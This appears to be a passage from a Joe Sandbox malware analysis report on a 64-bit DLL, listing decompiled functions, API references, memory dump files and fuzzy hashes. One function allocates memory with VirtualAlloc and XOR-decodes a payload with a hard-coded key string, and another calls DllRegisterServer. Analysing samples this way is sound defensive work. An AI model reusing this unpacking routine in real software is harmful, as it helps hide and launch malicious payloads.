				E00007FFA7FFA094F9764();
				if (_v40 - _v32 - 8 >= 0) goto 0x94f1450;
				E00007FFA7FFA094F9764();
				if (_v40 - _v32 - 0x27 <= 0) goto 0x94f146b;
				E00007FFA7FFA094F9764();
				_a8 = _v32;
				0x94f4184(); // executed
				return __eax / _a24;
			}

0x7ffa094f13a0
0x7ffa094f13a5
0x7ffa094f13aa
0x7ffa094f13c6
0x7ffa094f13c8
0x7ffa094f13d8
0x7ffa094f13e6
0x7ffa094f13f1
0x7ffa094f1402
0x7ffa094f1404
0x7ffa094f1412
0x7ffa094f141f
0x7ffa094f142e
0x7ffa094f1430
0x7ffa094f1449
0x7ffa094f144b
0x7ffa094f1464
0x7ffa094f1466
0x7ffa094f1470
0x7ffa094f147a
0x7ffa094f1483

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA094F13C8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA094F1404
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA094F1430
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA094F144B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA094F1466

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
Instruction ID: cc9070a7a78a7eaa67110bb24599c913ebc35d9b997152b8f5799a3295aca0fa
Opcode Fuzzy Hash: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
Instruction Fuzzy Hash: EA21FC2661DB85C1DA60EF6AF49021AB7A4F7CD7A4F004635EADD42BA9DF3DD160CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09509510 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFA7FFA09509510(intOrPtr __edx, long long __rcx, void* __rdx, long long _a8, intOrPtr _a16) {
				long long _v16;
				long long _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t35;
				signed int _t48;
				long long _t63;
				intOrPtr _t64;
				void* _t66;
				void* _t76;
				void* _t77;

				_a16 = __edx;
				_a8 = __rcx;
				_v24 = 0;
				_t63 = "*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5";
				_v16 = _t63;
				_v32 = E00007FFA7FFA094F91B8(_t63, _t66, L"64", _t76, _t77);
				_v36 = E00007FFA7FFA094F91B8(_t63, _t66, L"4096", _t76, _t77);
				_t35 = E00007FFA7FFA094F91B8(_t63, _t66, L"8192", _t76, _t77);
				r9d = _v32;
				r8d = _v36 | _t35;
				VirtualAlloc(??, ??, ??, ??); // executed
				_v24 = _t63;
				if (_v24 != 0) goto 0x950958f;
				goto 0x95095f4;
				_v40 = 0;
				goto 0x95095a3;
				_v40 = _v40 + 1;
				if (_v40 - _a16 >= 0) goto 0x95095ef;
				_t64 = _v40;
				_v28 =  *(_a8 + _t64) & 0x000000ff;
				asm("cdq");
				_t48 = _v28 ^  *(_v16 + _t64) & 0x000000ff;
				 *(_v24 + _v40) = _t48;
				goto 0x9509599;
				return _t48;
			}

0x7ffa09509510
0x7ffa09509514
0x7ffa0950951d
0x7ffa09509526
0x7ffa0950952d
0x7ffa0950953e
0x7ffa0950954e
0x7ffa09509559
0x7ffa0950956e
0x7ffa09509571
0x7ffa09509578
0x7ffa0950957e
0x7ffa09509589
0x7ffa0950958d
0x7ffa0950958f
0x7ffa09509597
0x7ffa0950959f
0x7ffa095095ab
0x7ffa095095ad
0x7ffa095095bb
0x7ffa095095c3
0x7ffa095095de
0x7ffa095095ea
0x7ffa095095ed
0x7ffa095095f8

APIs

VirtualAlloc.KERNELBASE ref: 00007FFA09509578

Strings

*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5, xrefs: 00007FFA09509526
4096, xrefs: 00007FFA09509542
8192, xrefs: 00007FFA09509552

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: AllocVirtual
String ID: *sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5$4096$8192
API String ID: 4275171209-3063897839
Opcode ID: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
Instruction ID: 1a20b555567d849f669fd325101234d5983dfe7c42ff25dc34c1bb1761c38350
Opcode Fuzzy Hash: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
Instruction Fuzzy Hash: 97210832A186818AD764CF26F49022AB7A4FBCD744F408139F68E83B59DF3CE5458F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F12B0 Relevance: 6.1, APIs: 4, Instructions: 51
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FFA7FFA094F12B0(signed int __eax, signed int __rcx, signed int __rdx, signed int _a8, signed int _a16, signed char _a24) {
				long long _v16;
				long long _v24;
				signed long long _v32;
				signed long long _v40;
				void* _t40;
				long long _t54;
				signed long long _t57;
				signed long long _t58;
				void* _t60;

				_a24 = r8b;
				_a16 = __rdx;
				_a8 = __rcx;
				_v40 = 0;
				if (_a8 != 0) goto 0x94f12de;
				goto 0x94f1397;
				_t42 = __eax % _a16;
				if (0xffffffff - _a8 >= 0) goto 0x94f12f8;
				E00007FFA7FFA094F4E7C(__eax % _a16, 0xffffffff - _a8, 0xffffffff, _t60);
				_v32 = _a8 * _a16;
				if ((_a24 & 0x000000ff) == 0) goto 0x94f137c;
				if (_v32 - 0x1000 < 0) goto 0x94f137c;
				_v24 = _v32 + 0x27;
				_t54 = _v32;
				if (_v24 - _t54 > 0) goto 0x94f133b;
				E00007FFA7FFA094F4E7C(_t42, _v24 - _t54, _t54, _t60);
				E00007FFA7FFA094F3D6C(_t54, _v24); // executed
				_v16 = _t54;
				E00007FFA7FFA094F9764();
				_t57 = _v16 + 0x00000027 & 0xffffffe0;
				_v40 = _t57;
				_t58 = _t57 * 0xffffffff;
				 *((long long*)(_v40 + _t58)) = _v16;
				goto 0x94f1392;
				_t40 = E00007FFA7FFA094F3D6C(_t58, _v32);
				_v40 = _t58;
				E00007FFA7FFA094F9764();
				return _t40;
			}

0x7ffa094f12b0
0x7ffa094f12b5
0x7ffa094f12ba
0x7ffa094f12c3
0x7ffa094f12d2
0x7ffa094f12d9
0x7ffa094f12e7
0x7ffa094f12f1
0x7ffa094f12f3
0x7ffa094f1303
0x7ffa094f130f
0x7ffa094f131a
0x7ffa094f1325
0x7ffa094f132a
0x7ffa094f1334
0x7ffa094f1336
0x7ffa094f1340
0x7ffa094f1345
0x7ffa094f134c
0x7ffa094f135a
0x7ffa094f135e
0x7ffa094f1368
0x7ffa094f1376
0x7ffa094f137a
0x7ffa094f1381
0x7ffa094f1386
0x7ffa094f138d
0x7ffa094f139b

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FFA094F12F3
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFA094F1336
new.LIBCMT ref: 00007FFA094F1340

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
Instruction ID: 014035a041dec758ef361d97acecd0e54a3c4c9c8ebda57f64cb3ca2d28b0b99
Opcode Fuzzy Hash: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
Instruction Fuzzy Hash: 4D21DF2251CB86C1EA609F25F05032AB7A4FB8D7A4F004725F6ED46BE9DF6DD1648B04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F2970 Relevance: 4.5, APIs: 3, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00007FFA7FFA094F2970(void* __edx, void* __eflags, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				signed int _v16;
				char _v48;
				long long _v56;
				signed long long _v64;
				signed int _v72;
				void* _t35;
				void* _t37;
				signed long long _t39;
				signed long long _t40;
				signed long long _t61;

				_t37 = __eflags;
				_t36 = __edx;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v56 = 0xfffffffe;
				_t39 =  *0x956e008; // 0x53c008c84601
				_t40 = _t39 ^ _t61;
				_v16 = _t40;
				_v72 = 0;
				E00007FFA7FFA094F1760(__edx,  &_v48);
				E00007FFA7FFA094F1490(_t40, _a16);
				_v64 = _t40;
				E00007FFA7FFA094F11A0(_a24);
				E00007FFA7FFA094F2CC0(__edx, _t37, _v64 + _t40,  &_v48, _v64 + _t40, __r8); // executed
				E00007FFA7FFA094F2E90( &_v48, _a16);
				E00007FFA7FFA094F2E60( &_v48, _a24);
				E00007FFA7FFA094F16A0(__edx, _v64 + _t40, _a8,  &_v48);
				_v72 = _v72 | 0x00000001;
				return E00007FFA7FFA094F3A70(E00007FFA7FFA094F1540( &_v48), _t35, _t36, _v16 ^ _t61);
			}

0x7ffa094f2970
0x7ffa094f2970
0x7ffa094f2970
0x7ffa094f2975
0x7ffa094f297a
0x7ffa094f2983
0x7ffa094f298c
0x7ffa094f2993
0x7ffa094f2996
0x7ffa094f299b
0x7ffa094f29a8
0x7ffa094f29b3
0x7ffa094f29b8
0x7ffa094f29c5
0x7ffa094f29dd
0x7ffa094f29ec
0x7ffa094f29fe
0x7ffa094f2a0d
0x7ffa094f2a19
0x7ffa094f2a3d

APIs

char_traits.LIBCPMTD ref: 00007FFA094F29C5
type_info::_name_internal_method.LIBCMTD ref: 00007FFA094F29EC
type_info::_name_internal_method.LIBCMTD ref: 00007FFA094F29FE

Part of subcall function 00007FFA094F16A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F16BC

Part of subcall function 00007FFA094F1540: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F1567

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::EmptyQueue::StructuredWorktype_info::_name_internal_method$char_traits
String ID:
API String ID: 652137993-0
Opcode ID: ff68c045757dc1b95a1c3926b66d183a1748918898d640881b2e4fd44b880452
Instruction ID: fe7b9d162cf7f6350b05e1d37e7b900ccddc3eeac23454e27cc3c3338fb519f4
Opcode Fuzzy Hash: ff68c045757dc1b95a1c3926b66d183a1748918898d640881b2e4fd44b880452
Instruction Fuzzy Hash: 3D114D2261CA8281EA10DF24F4A116BB7A0FBC97D4F505222F6DE43BA9DF3DD155CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F1B40 Relevance: 4.5, APIs: 3, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00007FFA7FFA094F1B40(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
				signed char _t23;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFA7FFA094F2250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x94f1b97;
				E00007FFA7FFA094F18F0(__rax, _a8);
				E00007FFA7FFA094F1BF0(_a16 - __rax, _a8, _a8, _a16 - __rax, _a24);
				goto 0x94f1be0;
				r8d = 0;
				_t23 = E00007FFA7FFA094F22B0(_t31, _a8, _a24); // executed
				if ((_t23 & 0x000000ff) == 0) goto 0x94f1bdb;
				E00007FFA7FFA094F18F0(_t31, _a8);
				E00007FFA7FFA094F11E0(_t31, _a16, _a24);
				return E00007FFA7FFA094F23A0(_t31, _a8, _a24);
			}

0x7ffa094f1b40
0x7ffa094f1b45
0x7ffa094f1b4a
0x7ffa094f1b67
0x7ffa094f1b6e
0x7ffa094f1b90
0x7ffa094f1b95
0x7ffa094f1b97
0x7ffa094f1ba4
0x7ffa094f1bae
0x7ffa094f1bb5
0x7ffa094f1bc7
0x7ffa094f1be4

APIs

Part of subcall function 00007FFA094F2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F226B
Part of subcall function 00007FFA094F2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F227C

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1B6E

Part of subcall function 00007FFA094F18F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F18FE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F1BB5
char_traits.LIBCPMTD ref: 00007FFA094F1BC7

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$EmptyQueue::Structuredchar_traits
String ID:
API String ID: 872432861-0
Opcode ID: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
Instruction ID: 35ee3a267d4b5a3fae358d89ffffd2e4166a9f3a559a824ba7856fcd242bb15d
Opcode Fuzzy Hash: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
Instruction Fuzzy Hash: 2E119D6662CA82C5DA409B66F4A146B6360FBCEBC0F505036FE8E47B5ADE2ED410CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F3F18 Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00007FFA7FFA094F3F18(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;

				_t2 =  ==  ? 1 :  *0x956f1a0 & 0x000000ff;
				 *0x956f1a0 =  ==  ? 1 :  *0x956f1a0 & 0x000000ff;
				E00007FFA7FFA094F4760(1, _t12, _t17, _t18, _t19, _t20);
				if (E00007FFA7FFA094F6AC0() != 0) goto 0x94f3f47;
				goto 0x94f3f5b; // executed
				E00007FFA7FFA094FA844(_t17); // executed
				if (0 != 0) goto 0x94f3f59;
				E00007FFA7FFA094F6B1C(0);
				goto 0x94f3f43;
				return 1;
			}

0x7ffa094f3f2c
0x7ffa094f3f2f
0x7ffa094f3f35
0x7ffa094f3f41
0x7ffa094f3f45
0x7ffa094f3f47
0x7ffa094f3f4e
0x7ffa094f3f52
0x7ffa094f3f57
0x7ffa094f3f60

APIs

__isa_available_init.LIBCMT ref: 00007FFA094F3F35
__vcrt_initialize.LIBVCRUNTIME ref: 00007FFA094F3F3A

Part of subcall function 00007FFA094F6AC0: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFA094F6AC4
Part of subcall function 00007FFA094F6AC0: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFA094F6AC9
Part of subcall function 00007FFA094F6AC0: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFA094F6ACE

__vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFA094F3F52

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
String ID:
API String ID: 3388242289-0
Opcode ID: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
Instruction ID: 51fc37f78ac18cc2caae77c9222b545bc156d084d3d9f634c1640cb3e9d527c1
Opcode Fuzzy Hash: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
Instruction Fuzzy Hash: 59E0C210E0C28745FE682F71B8622BA12A40F1F380F8490B9DC5E423838E0FB479A535

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA09503F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA09503F70() {
				long long _v24;
				long long _t5;
				intOrPtr _t7;

				_v24 = 0;
				_t7 =  *0x956fdd8; // 0x180000000
				E00007FFA7FFA09509600(_t5, "fx", _t7, "DllRegisterServer");
				_v24 = _t5;
				ExitProcess(??);
			}

0x7ffa09503f74
0x7ffa09503f84
0x7ffa09503f92
0x7ffa09503f97
0x7ffa09503f9c

APIs

ExitProcess.KERNEL32 ref: 00007FFA09503F9C

Strings

DllRegisterServer, xrefs: 00007FFA09503F7D

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
Instruction ID: d6c2c55d2618ed17f39c47b12eaa21f6f339e394bc8eba6c778be90b0274ebe8
Opcode Fuzzy Hash: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
Instruction Fuzzy Hash: 67D06761918A8281D6209F61F85539A63B8BB8E348F809131E58D46765DF3CF25ECB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FDEA8 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FFA7FFA094FDEA8(void* __ecx, long long __rbx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed char _t53;
				signed int _t54;
				void* _t73;
				long long _t77;
				intOrPtr _t78;
				void* _t95;
				long _t98;

				_t73 = _t95;
				 *((long long*)(_t73 + 8)) = __rbx;
				 *((long long*)(_t73 + 0x10)) = __rbp;
				 *((long long*)(_t73 + 0x18)) = __rsi;
				 *((long long*)(_t73 + 0x20)) = __rdi;
				r14d = 0;
				_t77 =  *((intOrPtr*)(0x7ffa0956f968)) + 2;
				if (_t77 - 1 <= 0) goto 0x94fdefb;
				 *0x7FFA0956F978 =  *0x7FFA0956F978 | 0x00000080;
				goto 0x94fdf86;
				 *0x7FFA0956F978 = 0x81;
				if (0 == 0) goto 0x94fdf1c;
				if (0 == 0) goto 0x94fdf15;
				goto 0x94fdf21;
				goto 0x94fdf21;
				GetStdHandle(_t98);
				_t21 = _t77 + 1; // 0x1
				if (_t21 - 1 <= 0) goto 0x94fdf61;
				_t53 = GetFileType(??); // executed
				if (_t53 == 0) goto 0x94fdf61;
				_t54 = _t53 & 0x000000ff;
				 *((long long*)(0x7ffa0956f968)) = _t77;
				if (_t54 != 2) goto 0x94fdf55;
				 *0x7FFA0956F978 =  *0x7FFA0956F978 | 0x00000040;
				goto 0x94fdf86;
				if (_t54 != 3) goto 0x94fdf86;
				 *0x7FFA0956F978 =  *0x7FFA0956F978 | 0x00000008;
				goto 0x94fdf86;
				 *0x7FFA0956F978 =  *0x7FFA0956F978 | 0x00000040;
				 *((long long*)( *0x7FFA0F2DD6A8 + 0x28)) = 0xfffffffe;
				_t78 =  *0x956fd78; // 0x0
				if (_t78 == 0) goto 0x94fdf86;
				 *((intOrPtr*)( *((intOrPtr*)(_t98 + _t78)) + 0x18)) = 0xfffffffe;
				if (1 != 3) goto 0x94fdec6;
				return _t54;
			}

0x7ffa094fdea8
0x7ffa094fdeab
0x7ffa094fdeaf
0x7ffa094fdeb3
0x7ffa094fdeb7
0x7ffa094fdec3
0x7ffa094fdee7
0x7ffa094fdeef
0x7ffa094fdef1
0x7ffa094fdef6
0x7ffa094fdefb
0x7ffa094fdf04
0x7ffa094fdf09
0x7ffa094fdf13
0x7ffa094fdf1a
0x7ffa094fdf21
0x7ffa094fdf2a
0x7ffa094fdf32
0x7ffa094fdf37
0x7ffa094fdf3f
0x7ffa094fdf41
0x7ffa094fdf44
0x7ffa094fdf4c
0x7ffa094fdf4e
0x7ffa094fdf53
0x7ffa094fdf58
0x7ffa094fdf5a
0x7ffa094fdf5f
0x7ffa094fdf61
0x7ffa094fdf66
0x7ffa094fdf6f
0x7ffa094fdf79
0x7ffa094fdf7f
0x7ffa094fdf8f
0x7ffa094fdfaf

APIs

GetStdHandle.KERNEL32 ref: 00007FFA094FDF21
GetFileType.KERNELBASE ref: 00007FFA094FDF37

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 8195fa56953df887960c625c907aa558cd447f31b22e017c21e87f709c57afde
Instruction ID: 2ce96e52cd8f2ea628976c63e11458a763cabcf6823b445557bd8dee6fc45ba2
Opcode Fuzzy Hash: 8195fa56953df887960c625c907aa558cd447f31b22e017c21e87f709c57afde
Instruction Fuzzy Hash: D1318122E18B4681E7608F25A5905786650FB4EBB0F685379EB6E473E0CF39E461C351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094FA9DC Relevance: 3.0, APIs: 2, Instructions: 19
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E00007FFA7FFA094FA9DC(intOrPtr* __rax, void* __rcx) {
				int _t1;
				intOrPtr _t3;
				void* _t4;
				void* _t11;
				intOrPtr _t14;

				if (__rcx == 0) goto 0x94faa17;
				_t14 =  *0x956f930; // 0x1d0bdf90000, executed
				_t1 = HeapFree(_t11, ??); // executed
				if (_t1 != 0) goto 0x94faa12;
				_t3 = E00007FFA7FFA094FB34C(GetLastError(), __rax, _t14, __rcx);
				_t4 = E00007FFA7FFA094FB420(__rax);
				 *__rax = _t3;
				return _t4;
			}

0x7ffa094fa9df
0x7ffa094fa9eb
0x7ffa094fa9f2
0x7ffa094fa9fa
0x7ffa094faa04
0x7ffa094faa0b
0x7ffa094faa10
0x7ffa094faa17

APIs

RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFA094FF492,?,?,?,00007FFA094FF4CF,?,?,00000000,00007FFA094FF144,?,?,?,00007FFA094FF077), ref: 00007FFA094FA9F2
GetLastError.KERNEL32(?,?,00000000,00007FFA094FF492,?,?,?,00007FFA094FF4CF,?,?,00000000,00007FFA094FF144,?,?,?,00007FFA094FF077), ref: 00007FFA094FA9FC

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: ErrorLastPrivilegeRelease
String ID:
API String ID: 1334314998-0
Opcode ID: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
